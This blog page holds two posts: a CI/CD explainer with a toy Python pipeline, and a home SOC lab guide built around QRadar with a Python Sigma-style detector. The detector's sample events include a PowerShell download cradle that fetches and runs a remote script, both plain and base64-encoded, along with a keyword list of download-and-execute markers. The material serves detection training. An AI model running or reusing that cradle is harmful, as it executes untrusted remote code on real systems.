This blog is all about Cyber Security and IT

Thursday, April 20, 2023

Concept of CI/CD in Detail

CI stands for Continuous Integration. 

The purpose of CI is to give developers rapid feedback on how well their change fits with the rest of the project. When changes are pushed to the Git repository (or SVN or another version control system), a pull request (PR) is opened to merge them into the main branch. Opening the PR triggers the CI pipeline, which compiles and builds the code (where applicable) and runs automated checks such as unit tests and code-coverage measurement. This is also the natural place for linting, static analysis and dependency vulnerability scanning, because a finding there blocks the merge before the code reaches anyone else.

The purpose of these checks is to ensure that the change integrates cleanly with the rest of the application. If everything passes, the code can be merged into the main branch once another team member has reviewed and approved it. The CI pipeline should also produce an artifact, which can be as simple as a zip file or as complex as an executable or an installable package. The artifact is pushed to an artifact repository such as AWS S3 or Sonatype Nexus (JFrog Artifactory is another), which keeps every version and lets later stages retrieve a specific one. Recording the artifact's checksum or digest at this point lets every later stage verify that it is deploying exactly the bytes CI built.

CD stands for Continuous Delivery. CD ensures that the code is not only integrated with the application but is also deployable to an environment that closely mimics production. If the application follows a microservices architecture, CD tests the whole system together, including end-to-end tests and user acceptance tests (UAT). CD pulls the artifact from the artifact repository and delivers it to one or more environments. The same artifact is used in every stage of CD: the build is not repeated per environment, and the artifact that passed staging is the one promoted to production.

However, in continuous delivery the release to production is a manual decision because of its criticality. Someone selects which version of the artifact goes to production and triggers the same CD process against the live environment. CD involves the actual deployment, which can range from copying files with SFTP or rsync over SSH (plain FTP sends credentials in clear text and should be avoided) to using configuration management tools such as Ansible or AWS Systems Manager (SSM). If the environment is containerized, kubectl, helm and kustomize are used. Environments can also be created and destroyed on the fly with IaC tools such as Terraform, with machine images built by Packer.

In more advanced setups the deployment to production is also automated; this is called continuous deployment. It requires extensive testing to guarantee code and application quality in production. QA includes functional testing, performance testing and stress testing, among others. CD should also be able to roll back a failed deployment, which blue/green deployments and feature flags make possible: with blue/green the previous environment is still running and traffic is simply switched back to it, and a feature flag turns a bad feature off without redeploying.
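As an added example (not code from this post), the following Python script models the flow just described: CI runs its checks, builds a versioned artifact and publishes it together with its SHA-256 digest; CD promotes that same artifact to staging and then, only after an explicit manual approval, to production, re-checking the digest at each stage. The repository class, the sample source files and the check functions are stand-ins invented for the illustration; a real pipeline would use S3, Nexus or similar and a real test suite.

```python
"""Added example, not code from the original post: a toy model of the CI/CD flow
described above. ArtifactRepository, ci_pipeline, cd_deploy and the sample
source files are assumptions made for this illustration."""
import hashlib
import io
import zipfile

SOURCE_FILES = {  # constructed stand-in for a checked-out repository
    "app.py": b"def main():\n    return 'ok'\n",
    "requirements.txt": b"requests==2.31.0\n",
}


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_artifact(version: str, files: dict) -> bytes:
    """CI build step: package the files into one zip artifact.
    Fixed timestamps make the bytes reproducible, so the digest is stable."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in sorted(files.items()) + [("VERSION", version.encode())]:
            info = zipfile.ZipInfo(name, date_time=(1980, 1, 1, 0, 0, 0))
            info.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(info, data)
    return buf.getvalue()


class ArtifactRepository:
    """Stand-in for an artifact store such as S3 or Nexus: versions are write-once
    and the digest CI recorded at publish time is kept alongside the blob."""

    def __init__(self):
        self._blobs = {}
        self.manifest = {}  # version -> sha256 hex digest recorded by CI

    def publish(self, version: str, blob: bytes) -> str:
        if version in self.manifest:
            raise ValueError(f"{version} already published; versions are immutable")
        self._blobs[version] = blob
        self.manifest[version] = sha256(blob)
        return self.manifest[version]

    def fetch(self, version: str) -> bytes:
        return self._blobs[version]


# Constructed stand-ins for the unit tests and checks CI would run on the checkout.
CI_TESTS = {
    "app_defines_main": lambda files: b"def main()" in files["app.py"],
    "dependencies_pinned": lambda files: all(
        b"==" in line for line in files["requirements.txt"].splitlines() if line),
}


def ci_pipeline(repo, version, files, tests=CI_TESTS):
    """Run the checks; build and publish the artifact only when every check passed."""
    results = {name: bool(check(files)) for name, check in tests.items()}
    if not all(results.values()):
        return {"published": False, "tests": results}
    digest = repo.publish(version, build_artifact(version, files))
    return {"published": True, "tests": results, "sha256": digest}


def cd_deploy(repo, version, environment, deployed):
    """Promote the artifact to one environment. The digest is re-checked so the
    bytes reaching staging and production are exactly what CI published."""
    blob = repo.fetch(version)
    actual, expected = sha256(blob), repo.manifest[version]
    if actual != expected:
        raise RuntimeError(f"{environment}: {version} digest {actual} != {expected}")
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        if zf.read("VERSION").decode() != version:
            raise RuntimeError(f"{environment}: artifact labels itself as another version")
    deployed[environment] = (version, actual)  # simulated deployment
    return actual


def release_to_production(repo, version, deployed, approver):
    """Manual gate: a named person picks a version that has already passed staging."""
    if not approver:
        raise PermissionError("production release needs an explicit approver")
    if deployed.get("staging", (None,))[0] != version:
        raise RuntimeError(f"{version} has not been deployed to staging")
    return cd_deploy(repo, version, "production", deployed)


def run_demo():
    repo, deployed = ArtifactRepository(), {}
    ci = ci_pipeline(repo, "1.4.2", SOURCE_FILES)
    cd_deploy(repo, "1.4.2", "staging", deployed)
    release_to_production(repo, "1.4.2", deployed, approver="release-manager")
    return ci, deployed


if __name__ == "__main__":
    print(run_demo())
```

The two properties worth carrying into a real pipeline are the write-once version in the repository and the digest check in cd_deploy: together they mean a modified or re-uploaded artifact cannot silently reach production under a version number that CI already vouched for.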

Wednesday, March 29, 2023

How to Study Cyber SOC at home in 2023

Below is the complete guide to help you study cyber SOC at home.

Let's install a SIEM first:

There are various SIEMs on the market, such as QRadar, Graylog, ELK, Splunk and Sumo Logic, but this guide uses QRadar Community Edition (CE) as the example.

Download >
Install >

All the material you need:

If you encounter any of these issues below, I've collected the solutions.

. Install the WinCollect Agent another way

. Send Linux logs to QRadar

. No Log Activity | QRadar CE

. No Log Activity | QRadar Code

. Log source problems

. Modify the maximum log size using Group Policy

. Rule creation and use-case creation basics in QRadar SIEM

✔️ Don't forget to generate an authentication token under Admin > Authorized Services in QRadar and enter it in the WinCollect Agent when you install it; without it the agent cannot send events to the console.

✔️ Where to find how to collect logs and events from Windows, Linux, databases, etc.:
 . DSM Configuration Guide:
Does it work? Great! That is a mini SOC. Document it somewhere and link it from your resume.🙏

------> Additional steps: <------

- Increase log visibility (enable PowerShell module logging and script block logging, install Sysmon, etc.)

- Install extra tools to get more visibility, e.g. BLUESPAWN, DeepBlueCLI, Suricata, Zeek, RITA (all are on GitHub)

- Test your setup! Be the bad guy and try to catch yourself. (WinPwn, Atomic Red Team, Caldera; again, check out GitHub)

- If needed, improve your SIEM with matching alert rules and build dashboards. (Ideas? Look at Sigma rules on GitHub.)
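As an added example, not from the original post, here is a small Python detector in the spirit of a Sigma rule, run over constructed Windows event records: a 4688 process creation with an encoded PowerShell command, a 4104 script block, and two benign events. It decodes the -EncodedCommand payload before matching, which is exactly the case where a plain keyword rule misses the download cradle and where the script block logging recommended above pays off. The event lines, rule definitions and function names are made up for the illustration; in practice the equivalent rule would be built in QRadar's rule editor against the events WinCollect forwards.

```python
"""Added example, not from the original post: a toy Sigma-style matcher that shows
why process/script block logging plus payload decoding matters. The events, rule
definitions and helper names are constructed for this illustration."""
import base64
import json
import re


def encode_powershell(command: str) -> str:
    """Produce the base64 form PowerShell expects after -EncodedCommand (UTF-16LE)."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded -enc/-EncodedCommand payload, or None if absent/malformed."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                  command_line, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample events in a JSON-lines style; not real telemetry.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"
SAMPLE_EVENTS = [
    json.dumps({"EventID": 4688, "Host": "WS01",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(CRADLE)}),
    json.dumps({"EventID": 4104, "Host": "WS01", "ScriptBlockText": CRADLE}),
    json.dumps({"EventID": 4688, "Host": "WS02",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"}),
    json.dumps({"EventID": 1, "Host": "WS03", "Image": r"C:\Windows\System32\notepad.exe",
                "CommandLine": r"notepad.exe C:\Users\a\notes.txt"}),
]

# Sigma-like rules: which fields to inspect and what to look for (matching is case-insensitive).
RULES = [
    {
        "title": "Suspicious PowerShell download cradle", "level": "high",
        "fields": ["CommandLine", "ScriptBlockText", "DecodedCommand"],
        "contains_any": ["downloadstring", "invoke-expression", "iex ", "net.webclient",
                         "frombase64string"],
    },
    {   # encoded commands have legitimate uses too, so this one is only medium on its own
        "title": "PowerShell executed with encoded command", "level": "medium",
        "fields": ["CommandLine"],
        "regex": r"\s-(?:e|ec|enc|encodedcommand)\s",
    },
]


def enrich(event: dict) -> dict:
    """Add DecodedCommand when the command line carries an encoded payload."""
    decoded = decode_encoded_command(event.get("CommandLine", ""))
    return dict(event, DecodedCommand=decoded) if decoded else event


def match_rule(rule: dict, event: dict) -> bool:
    haystack = " ".join(str(event.get(f, "")) for f in rule["fields"]).lower()
    if "contains_any" in rule:
        return any(needle in haystack for needle in rule["contains_any"])
    if "regex" in rule:
        return re.search(rule["regex"], haystack, re.IGNORECASE) is not None
    return False


def run_detection(lines, rules=RULES):
    """Parse each JSON event line, enrich it, and return one alert per matching rule."""
    alerts = []
    for line in lines:
        event = enrich(json.loads(line))
        for rule in rules:
            if match_rule(rule, event):
                alerts.append({"rule": rule["title"], "level": rule["level"],
                               "host": event["Host"], "event_id": event["EventID"]})
    return alerts


if __name__ == "__main__":
    print(json.dumps(run_detection(SAMPLE_EVENTS), indent=2))
```

Running it yields three alerts: the cradle rule fires twice (once on the decoded 4688 command line, once on the 4104 script block) and the encoded-command rule once, while the scheduled backup script and notepad produce nothing. Dropping the DecodedCommand field from the first rule makes the encoded 4688 event slip past it, which is the gap that script block logging (4104) closes even when the process command line is obfuscated.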